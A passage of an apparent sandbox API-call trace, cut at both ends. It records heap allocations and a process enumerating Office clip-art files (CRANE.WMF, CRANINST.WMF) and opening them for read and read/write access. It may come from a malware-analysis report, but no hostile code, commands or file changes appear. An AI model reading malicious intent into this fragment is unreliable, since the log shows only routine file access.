0x7d0a0 [0103.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0103.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0103.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0103.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0103.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0103.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0103.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0103.764] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.764] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.764] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.764] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0103.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.764] AreFileApisANSI () returned 1 [0103.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF", lpUsedDefaultChar=0x0) returned 66 [0103.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0103.765] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.765] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0103.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0103.765] AreFileApisANSI () returned 1 [0103.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0103.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82a78 [0103.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x82a78, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF") returned 66 [0103.765] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\crane.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.765] GetFileType (hFile=0x368) returned 0x1 [0103.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82a78 | out: hHeap=0x20000) returned 1 [0103.765] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.766] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.766] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.766] CloseHandle (hObject=0x368) returned 1 [0103.766] AreFileApisANSI () returned 1 [0103.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0103.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82208 [0103.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x82208, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF") returned 66 [0103.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\crane.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.766] GetFileType (hFile=0x368) returned 0x1 [0103.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82208 | out: hHeap=0x20000) returned 1 [0103.766] CloseHandle (hObject=0x368) returned 1 [0103.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0103.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0103.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0103.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0103.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0103.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0103.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0103.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0103.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0103.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0103.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0103.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0103.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.768] AreFileApisANSI () returned 1 [0103.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0103.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x820e8 [0103.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x820e8, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF") returned 66 [0103.768] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\crane.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd71e4b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd71e4b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd71e4b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1496)) returned 1 [0103.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x820e8 | out: hHeap=0x20000) returned 1 [0103.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0103.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0103.768] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.768] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.768] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd71e4b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc18a, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="CRANINST.WMF", cAlternateFileName="")) returned 1 [0103.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0103.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0103.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0103.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0103.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0103.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0103.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0103.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0103.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0103.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0103.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0103.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0103.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0103.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0103.769] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.769] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.769] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.769] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0103.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.769] AreFileApisANSI () returned 1 [0103.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0103.769] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.769] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0103.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0103.770] AreFileApisANSI () returned 1 [0103.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0103.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 69 [0103.770] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\craninst.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.770] GetFileType (hFile=0x368) returned 0x1 [0103.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0103.770] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.770] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.770] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.771] CloseHandle (hObject=0x368) returned 1 [0103.771] AreFileApisANSI () returned 1 [0103.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0103.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 69 [0103.771] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\craninst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.771] GetFileType (hFile=0x368) returned 0x1 [0103.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0103.771] CloseHandle (hObject=0x368) returned 1 [0103.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0103.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0103.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0103.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0103.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0103.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0103.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0103.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0103.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.773] AreFileApisANSI () returned 1 [0103.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a2d0 [0103.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8a2d0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 69 [0103.773] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\craninst.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd71e4b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc18a)) returned 1 [0103.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0103.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0103.773] HeapFree (in: hHeap=0x20000, 